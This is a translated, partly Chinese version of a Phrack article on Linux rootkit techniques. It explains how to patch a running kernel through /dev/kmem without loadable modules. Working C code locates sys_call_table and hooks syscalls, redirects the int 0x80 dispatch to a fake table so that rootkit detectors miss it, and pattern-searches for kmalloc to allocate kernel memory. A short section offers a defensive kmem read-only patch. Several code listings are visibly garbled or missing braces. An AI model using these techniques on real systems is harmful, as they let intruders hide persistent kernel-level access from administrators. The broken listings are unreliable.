Linux on-the-fly kernel patching without LKM

Written by : sd
First published on : Phrack
Translated by : drinkey

   1 – 簡介

   2 – 我們的朋友–/dev/kmem

   3 – 替換核心系統呼叫,sys_call_table[]
     3.1 – 怎樣不用LKM得到 sys_call_table[]
     3.2 – 重定向中斷呼叫 0x80 到 sys_call_table[eax]

   4 – 不用 LKM 的支援來分配核心空間
     4.1 – 使用 LKM支援搜尋 kmalloc()
     4.2 – kmalloc() 的模式搜尋
     4.3 – GFP_KERNEL 的值
     4.4 – 重寫系統呼叫

   5 – 注意事項

   6 – 可能的解決方法

   7 – 結論

   8 – 參考

   9 – 附錄:SucKIT: 成就


首先,我們應該感謝很久以前開發了kernel patching技術的Silvio Cesare,我的大多數想法都是從他那裡竊取的:)


設想這樣一個場景:某人拿到了一台機器的root許可權,但管理員很變態,他禁用了那個人修改過的sshd;人們最愛的LKM rootkit也由於機器上沒有必要的gcc編譯器、庫、標頭檔案而無法編譯。
這裡有一些解決方案,一步一步的講解,文章的最後還有一個全功能的linux-ia32 rootkit,一個例子或者工具,它包含了所有這裡討論的技術。


2、我們的朋友 /dev/kmem




  /*
   * Read data from kmem: fetch `size` bytes located at absolute position
   * `offset` of descriptor `fd` into `buf`.
   *
   * Returns `size` on success, or 0 when the seek does not land on
   * `offset` or the read returns anything other than `size` bytes.
   */
  static inline int rkm(int fd, int offset, void *buf, int size)
  {
      if (lseek(fd, offset, SEEK_SET) != offset) {
          return 0;
      }
      if (read(fd, buf, size) != size) {
          return 0;
      }
      return size;
  }
  /*
   * Write data to kmem: store `size` bytes from `buf` at absolute position
   * `offset` of descriptor `fd`.
   *
   * Returns `size` on success, or 0 when the seek does not land on
   * `offset` or the write stores anything other than `size` bytes.
   */
  static inline int wkm(int fd, int offset, const void *buf, int size)
  {
      if (lseek(fd, offset, SEEK_SET) != offset) {
          return 0;
      }
      if (write(fd, buf, size) != size) {
          return 0;
      }
      return size;
  }
  17. /* 從 kmem 讀出一個整數 */  
  18. static inline int rkml(int fd, int offset, ulong *buf)  
  19. {  
  20.         return rkm(fd, offset, buf, sizeof(ulong));  
  21. }  
  23. /* 向 kmem 寫入一個整數 */  
  24. static inline int wkml(int fd, int offset, ulong buf)  
  25. {  
  26.         return wkm(fd, offset, &buf, sizeof(ulong));  
  27. }  
3、替換系統呼叫 sys_call_table[]


  1. /* as everywhere, “Hello world” is good for begginers ? */  
  3. /* 原始的系統呼叫 */  
  4. int (*old_write) (intchar *, int);  
  5.         /* 新的系統呼叫控制程式碼 */  
  6.         new_write(int fd, char *buf, int count) {  
  7.         if (fd == 1) {  /* 標準輸出 */  
  8.                 old_write(fd, “Hello world!
    , 13);  
  9.                 return count;  
  10.         } else {  
  11.                 return old_write(fd, buf, count);  
  12.         }  
  13. }  
  15. old_write = (void *) sys_call_table[__NR_write]; /* 儲存舊的系統呼叫 */  
  16. sys_call_table[__NR_write] = (ulong) new_write;  /* 設立新的系統呼叫 */  
  18. /* Err… there should be better things to do instead fucking up
  19. console with “Hello worlds” ? */  
 這樣的程式碼在大多數 LKM rootkit、tty 嗅探/劫持程式中經常遇到;在 LKM 環境下,我們確定可以直接匯入 sys_call_table[]。


3.1 – 怎樣不用LKM得到 sys_call_table[]


據我所知,得到 sys_call_table[] 最準確的方法是用下面程式碼實現:

  /*
   * Locate sys_call_table[] without LKM support or System.map:
   *   1. ask the CPU for the IDT base (sidt),
   *   2. read the int $0x80 gate descriptor from /dev/kmem,
   *   3. scan the start of the int $0x80 handler for the
   *      `call *table(,%eax,4)` opcode (ff 14 85 <32-bit table address>).
   */
  #define _GNU_SOURCE             /* memmem() is a GNU extension */
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <sys/types.h>
  #include <sys/stat.h>
  #include <fcntl.h>
  #include <unistd.h>

  /* Operand written by the `sidt` instruction: table limit, then base. */
  struct {
      unsigned short limit;
      unsigned int base;
  } __attribute__((packed)) idtr;

  /* One 8-byte IDT gate descriptor; the handler offset is split in two. */
  struct {
      unsigned short off1;        /* low 16 bits of the handler offset */
      unsigned short sel;
      unsigned char none, flags;
      unsigned short off2;        /* high 16 bits of the handler offset */
  } __attribute__((packed)) idt;

  int kmem;                       /* descriptor of /dev/kmem */

  /*
   * Read `sz` bytes found at kernel address `off` into `m`.
   * Any seek or read failure is fatal: a message is printed and the
   * program exits with status 2.
   */
  void readkmem(void *m, unsigned off, int sz)
  {
      if (lseek(kmem, (off_t)off, SEEK_SET) != (off_t)off) {
          perror("kmem lseek");
          exit(2);
      }
      if (read(kmem, m, sz) != sz) {
          perror("kmem read");
          exit(2);
      }
  }

  #define CALLOFF 100 /* we only read the first 100 bytes of the int $0x80 handler */

  int main(void)
  {
      unsigned sys_call_off;
      unsigned sct;
      char sc_asm[CALLOFF], *p;

      /* read the IDTR register */
      __asm__ ("sidt %0" : "=m" (idtr));
      printf("idtr base at 0x%X\n", (int)idtr.base);

      /* open kmem */
      kmem = open("/dev/kmem", O_RDONLY);
      if (kmem < 0) return 1;

      /* read the 0x80 vector from the IDT (into idt, NOT into idtr) */
      readkmem(&idt, idtr.base + 8 * 0x80, sizeof(idt));
      /* widen before shifting: off2 would otherwise overflow a signed int */
      sys_call_off = ((unsigned)idt.off2 << 16) | idt.off1;
      printf("idt80: flags = %X sel = %X off = %X\n",
             (unsigned)idt.flags, (unsigned)idt.sel, sys_call_off);

      /* look for the indirect call through sys_call_table */
      readkmem(sc_asm, sys_call_off, CALLOFF);
      p = memmem(sc_asm, CALLOFF, "\xff\x14\x85", 3);
      /* only trust a match whose 4 address bytes are inside the buffer */
      if (p && p + 3 + sizeof(sct) <= sc_asm + CALLOFF) {
          memcpy(&sct, p + 3, sizeof(sct));
          printf("sys_call_table at 0x%x, call dispatch at 0x%x\n",
                 sct, sys_call_off + (unsigned)(p - sc_asm));
      } else {
          fprintf(stderr, "call dispatch pattern not found\n");
      }
      close(kmem);
      return 0;
  }
這段程式碼具體是怎麼工作呢?sidt指令向處理器詢問中斷描述符表(IDT)的位置 [asm ("sidt %0" : "=m" (idtr));],從這個結構中我們可以得到 int $0x80 中斷描述符的指標。

從IDT中我們可以計算出int $0x80的入口點地址為[sys_call_off = (idt.off2 << 16) |
idt.off1;]。好了,我們知道 int $0x80
從哪裡開始,但是那並不是我們最終想要的sys_call_table[]。我們先看看int $0x80的入口點:

  1. [sd@pikatchu linux]$ gdb -q /usr/src/linux/vmlinux  
  2. (no debugging symbols found)…(gdb) disass system_call  
  3. Dump of assembler code for function system_call:  
  4. 0xc0106bc8 <system_call>:       push   %eax  
  5. 0xc0106bc9 <system_call+1>:     cld  
  6. 0xc0106bca <system_call+2>:     push   %es  
  7. 0xc0106bcb <system_call+3>:     push   %ds  
  8. 0xc0106bcc <system_call+4>:     push   %eax  
  9. 0xc0106bcd <system_call+5>:     push   %ebp  
  10. 0xc0106bce <system_call+6>:     push   %edi  
  11. 0xc0106bcf <system_call+7>:     push   %esi  
  12. 0xc0106bd0 <system_call+8>:     push   %edx  
  13. 0xc0106bd1 <system_call+9>:     push   %ecx  
  14. 0xc0106bd2 <system_call+10>:    push   %ebx  
  15. 0xc0106bd3 <system_call+11>:    mov    $0x18,%edx  
  16. 0xc0106bd8 <system_call+16>:    mov    %edx,%ds  
  17. 0xc0106bda <system_call+18>:    mov    %edx,%es  
  18. 0xc0106bdc <system_call+20>:    mov    $0xffffe000,%ebx  
  19. 0xc0106be1 <system_call+25>:    and    %esp,%ebx  
  20. 0xc0106be3 <system_call+27>:    cmp    $0x100,%eax  
  21. 0xc0106be8 <system_call+32>:    jae    0xc0106c75 <badsys>  
  22. 0xc0106bee <system_call+38>:    testb  $0x2,0x18(%ebx)  
  23. 0xc0106bf2 <system_call+42>:    jne    0xc0106c48 <tracesys>  
  24. 0xc0106bf4 <system_call+44>:    call   *0xc01e0f18(,%eax,4) <– 就是它  
  25. 0xc0106bfb <system_call+51>:    mov    %eax,0x18(%esp,1)  
  26. 0xc0106bff <system_call+55>:    nop  
  27. End of assembler dump.  
  28. (gdb) print &sys_call_table  
  29. $1 = (<data variable, no debug info> *) 0xc01e0f18      <– 看到了?一樣的  
  30. (gdb) x/xw (system_call+44)  
  31. 0xc0106bf4 <system_call+44>:    0x188514ff <– 機器指令(little endian)  
  32. (gdb)  
簡單來說,在 int $0x80 入口點附近有一條 `call sys_call_table(,eax,4)` 指令;由於這個間接呼叫在不同核心版本之間沒有變化,所以只搜尋 `call <something>(,eax,4)` 這種模式相對比較安全。

opcode = 0xff 0x14 0x85 0x<address_of_table>

[memmem (sc_asm,CALLOFF,"\xff\x14\x85",3);]

其實還有更強壯的做法:直接把IDT中整個int $0x80的處理程式重定向到我們的假處理程式,並在那裡攔截感興趣的呼叫。不過這樣會複雜一些,因為必須處理重入(reentrancy)問題。現在我們已經知道sys_call_table[]在哪裡,可以修改其中某些系統呼叫的地址了(虛擬碼):


  1. readkmem(&old_write, sct + __NR_write * 4, 4); /* save the old syscall handler */  
  2. writekmem(new_write, sct + __NR_write * 4, 4); /* install the new syscall handler */  
3.2 – 重定向中斷呼叫 0x80 到 sys_call_table[eax]
When writing this article, we found some “rootkit detectors” on
Packetstorm/Freshmeat. They are able to detect the fact that something
is wrong with a LKM/syscalltable/other kernel stuff…fortunately, most
of them are too stupid and can be simply fooled by the trick
introduced in [6] by SpaceWalker:

        ulong sct = addr of sys_call_table[]
        char *p = ptr to int 0x80`s call sct(,eax,4) – dispatch
        ulong nsct[256] = new syscall table with modified entries

        readkmem(nsct, sct, 1024);      /* read old */
        old_write = nsct[__NR_write];
        nsct[__NR_write] = new_write;
        /* replace dispatch to our new sct */
        writekmem((ulong) p+3, nsct, 4);

        /* Note that this code never can work, because you can`t
           redirect something kernel related to userspace, such as
           sct[] in this case */


We create a copy of the original sys_call_table[] [readkmem(nsct, sct,
1024);], then we will modify entries which we`re interested in
[old_write = nsct[__NR_write]; nsct[__NR_write] = new_write;] and then
change _only_ addr of <something> in the call

0xc0106bf4 <system_call+44>:    call   *0xc01e0f18(,%eax,4)
                                            |__ Here will be address of
                                                _our_ sct[]

LKM detectors (which do not check the consistency of int $0x80) won't see
anything, sys_call_table[] is the same, but int $0x80 uses our
implanted table.
Allocating kernel space without help of LKM support

Next thing that we need is a memory page above the 0xc0000000 (or 0x80000000) address.

The 0xc0000000 value is the demarcation point between user and kernel
memory. User processes do not have access above this limit. Take into
account that this value is not exact and may be different, so it is a
good idea to figure out the limit on the fly (from the int $0x80
entrypoint). Well, how do we get our page above the limit? Let's take a
look at how the regular kernel LKM support does it:

void inter_module_register(const char *im_name, struct module *owner,
                           const void *userdata)
        struct list_head *tmp;
        struct inter_module_entry *ime, *ime_new;

        if (!(ime_new = kmalloc(sizeof(*ime), GFP_KERNEL))) {
                /* Overloaded kernel, not fatal */

As we expected, they used kmalloc(size, GFP_KERNEL) ! But we can`t use kmalloc() yet because:

    * We don`t know the address of kmalloc() [ paragraph 4.1, 4.2 ]
    * We don`t know the value of GFP_KERNEL [ paragraph 4.3 ]
    * We can`t call kmalloc() from user-space [ paragraph 4.4 ]

Searching for kmalloc() using LKM support

If we can use LKM support:

/* kmalloc() lookup */

/*
 * Simplest & safest way, but only if LKM support is there.
 *
 * Looks up the kernel symbol `n` in the table exported through
 * get_kernel_syms() and returns its value, or 0 when the table cannot be
 * obtained, holds more than MAX_SYMS entries, or has no matching entry.
 *
 * Note: the comparison covers only strlen(n) characters, so the first
 * exported name that merely starts with `n` is accepted as well.
 */
ulong   get_sym(char *n) {
        struct  kernel_sym      tab[MAX_SYMS];
        int     numsyms;
        int     i;

        /* a NULL table only asks how many symbols are exported */
        numsyms = get_kernel_syms(NULL);
        if (numsyms > MAX_SYMS || numsyms < 0) return 0;
        /* the second call actually fills tab[]; without it the loop
           below would search uninitialised stack memory */
        if (get_kernel_syms(tab) < 0) return 0;
        for (i = 0; i < numsyms; i++) {
                if (!strncmp(n, tab[i].name, strlen(n)))
                        return tab[i].value;
        }
        return 0;
}

/*
 * kmalloc() lookup for kernels with LKM support: returns the value of the
 * exported "kmalloc" symbol as reported by get_sym(), or 0 when it is not
 * found. `pgoff` is not used by this variant.
 */
ulong   get_kma(ulong pgoff)
{
        ulong   ret;

        ret = get_sym("kmalloc");
        if (ret) return ret;
        return 0;
}

We leave this without comments.
Pattern search of kmalloc()

But if LKM support is not there, we're getting into trouble. The solution
is quite dirty, and not-so-good by the way, but it seems to work. We'll
walk through the kernel's .text section and look for patterns such as:

        push    GFP_KERNEL <something between 0-0xffff>
        push    size       <something between 0-0x1ffff>
        call    kmalloc

All info will be gathered into a table, sorted and the function called most times will be our kmalloc(), here is code:

/* kmalloc() lookup */
#define RNUM 1024
ulong   get_kma(ulong pgoff)
        struct { uint a,f,cnt; } rtab[RNUM], *t;
        uint            i, a, j, push1, push2;
        uint            found = 0, total = 0;
        uchar           buf[0x10010], *p;
        int             kmem;
        ulong           ret;

        /* uhh, before we try to brute something, attempt to do things
           in the *right* way ;)) */
        ret = get_sym(“kmalloc”);
        if (ret) return ret;

        /* humm, no way ;)) */
        kmem = open(KMEM_FILE, O_RDONLY, 0);
        if (kmem < 0) return 0;
        for (i = (pgoff + 0x100000); i < (pgoff + 0x1000000);
             i += 0x10000) {
                if (!loc_rkm(kmem, buf, i, sizeof(buf))) return 0;
                /* loop over memory block looking for push and calls */
                for (p = buf; p < buf + 0x10000;) {
                        switch (*p++) {
                                case 0x68:
                                        push1 = push2;
                                        push2 = *(unsigned*)p;
                                        p += 4;
                                case 0x6a:
                                        push1 = push2;
                                        push2 = *p++;
                                case 0xe8:
                                        if (push1 && push2 &&
                                            push1 <= 0xffff &&
                                            push2 <= 0x1ffff) break;
                                        push1 = push2 = 0;
                        /* we have push1/push2/call seq; get address */
                        a = *(unsigned *) p + i + (p – buf) + 4;
                        p += 4;
                        /* find in table */
                        for (j = 0, t = rtab; j < found; j++, t++)
                                if (t->a == a && t->f == push1) break;
                        if (j < found)
                                if (found >= RNUM) {
                                        return 0;
                                else {
                                        t->a = a;
                                        t->f = push1;
                                        t->cnt = 1;
                        push1 = push2 = 0;
                } /* for (p = buf; … */
        } /* for (i = (pgoff + 0x100000) …*/
        t = NULL;
        for (j = 0;j < found; j++)  /* find a winner */
                if (!t || rtab[j].cnt > t->cnt) t = rtab+j;
        if (t) return t->a;
        return 0;

The code above is a simple state machine and it doesn't bother itself
with potentially different asm code layout (when you use some exotic
GCC options). It could be extended to understand different code
patterns (see switch statement) and can be made more accurate by
checking GFP value in PUSHes against known patterns (see paragraph 4.3).

The accuracy of this code is about 80% (i.e. 80% points to kmalloc, 20% to some junk) and it seems to work OK on 2.2.1 => 2.4.13.
The GFP_KERNEL value

Next problem we get while using kmalloc() is the fact that value of
GFP_KERNEL varies between kernel series, but we can get rid of it by
help of uname()

| kernel version | GFP_KERNEL value |
| 1.0.x .. 2.4.5 |     0x3          |
| 2.4.6 .. 2.4.x |     0x1f0        |

Note that there are some troubles with 2.4.7-2.4.9 kernels, which
sometimes crash due to a bad GFP_KERNEL, simply because the table above
is not exact, it only shows values we CAN use.

The code:

#define NEW_GFP         0x1f0   /* GFP_KERNEL on 2.4.6 and later 2.4.x */
#define OLD_GFP         0x3     /* GFP_KERNEL up to 2.4.5 */

/* uname struc */
struct un {
        char    sysname[65];
        char    nodename[65];
        char    release[65];
        char    version[65];
        char    machine[65];
        char    domainname[65];
};

/*
 * Pick the GFP_KERNEL value matching the running kernel.
 *
 * Returns NEW_GFP when the release string reads "2.4.N" with N >= 6, or
 * with a two-digit N; returns OLD_GFP for everything else.
 */
int     get_gfp()
{
        /* zero-filled so the checks fall back to OLD_GFP if uname() fails */
        struct un s = {{0}};

        /* NOTE(review): assumes uname() fills a buffer laid out like
           struct un (six 65-byte fields) - confirm against the uname
           wrapper actually in use */
        uname(&s);
        if ((s.release[0] == '2') && (s.release[2] == '4') &&
            (s.release[4] >= '6' ||
            (s.release[5] >= '0' && s.release[5] <= '9'))) {
                return NEW_GFP;
        }
        return OLD_GFP;
}

Overwriting a syscall
As we mentioned above, we can`t call kmalloc() from user-space directly, solution is Silvio`s trick [2] of replacing syscall:

    * Get address of some syscall (IDT -> int 0x80 -> sys_call_table)
    * Create a small routine which will call kmalloc() and return pointer to allocated page
    * Save sizeof(our_routine) bytes of some syscall
    * Overwrite code of some syscall by our routine
    * Call this syscall from userspace thru int $0x80, so our routine
will operate in kernel context and can call kmalloc() for us passing
out the address of allocated memory as return value.
    * Restore code of some syscall with saved bytes (in step 3.)

our_routine may look as something like that:

/*
 * Argument block handed to our_routine(): it carries the function to call
 * and its two arguments in, and the result back out.
 */
struct  kma_struc {
        ulong   (*kmalloc) (uint, int); /* in:  function to call */
        int     size;                   /* in:  first argument of the call */
        int     flags;                  /* in:  second argument of the call */
        ulong   mem;                    /* out: value returned by the call */
} __attribute__ ((packed));

int     our_routine(struct kma_struc *k)
        k->mem = k->kmalloc(k->size, k->flags);
        return 0;

In this case we directly pass needed info to our routine.

Now we have kernel memory, so we can copy our handling routines there,
point entries in fake sys_call_table to them, infiltrate this fake
table into int $0x80 and enjoy the ride ?
What you should take care of
It would be good idea to follow these rules when writing something using this technique:

    * Take care of kernel versions (We mean GFP_KERNEL).
    * Play _only_ with syscalls, _do not_ use any internal kernel
structures including task_struct, if you want to stay portable between
kernel series.
    * SMP may cause some troubles, remember to take care about
reentrancy and, where it is needed, use user-space locks [
src/core.c#ualloc() ]

Possible solutions

Okay, now from the good man`s point of view. You probably would like to
defeat attacks of kids using such annoying toys. Then you should apply
following kmem read-only patch and disable LKM support in your kernel.

<++> kmem-ro.diff
--- /usr/src/linux/drivers/char/mem.c   Mon Apr  9 13:19:05 2001
+++ /usr/src/linux/drivers/char/mem.c   Sun Nov  4 15:50:27 2001
@@ -49,6 +51,8 @@
 const char * buf, size_t count, loff_t *ppos)
    ssize_t written;
+       /* disable kmem write */
+       return -EPERM;

  written = 0;
  #if defined(__sparc__) || defined(__mc68000__)

Note that this patch can be a source of trouble in conjunction with some
old utilities which depend on the /dev/kmem writing ability. That's the
price of security.

The raw memory I/O devices in linux seem to be pretty powerful.
Attackers (of course, with root privileges) can use them to hide their
actions, steal information, grant remote access and so on for a long
time without being noticed. As far as we know, there is not much use for
these devices (in the meaning of write access), so it may be a good idea
to disable their writing ability.

 [1] Silvio Cesare`s homepage, pretty good info about low-level linux stuff

 [2] Silvio's article describing run-time kernel patching (System.map)

 [3] QuantumG`s homepage, mostly virus related stuff

 [4] “Abuse of the Linux Kernel for Fun and Profit” by halflife
     [Phrack issue 50, article 05]

 [5] “(nearly) Complete Linux Loadable Kernel Modules. The definitive guide
      for hackers, virus coders and system administrators.”

At the end, I (sd) would like to thank devik for helping me a lot
with this crap, Reaction for common spelling checks and the anonymous
editor's friend who improved the quality of the article a lot.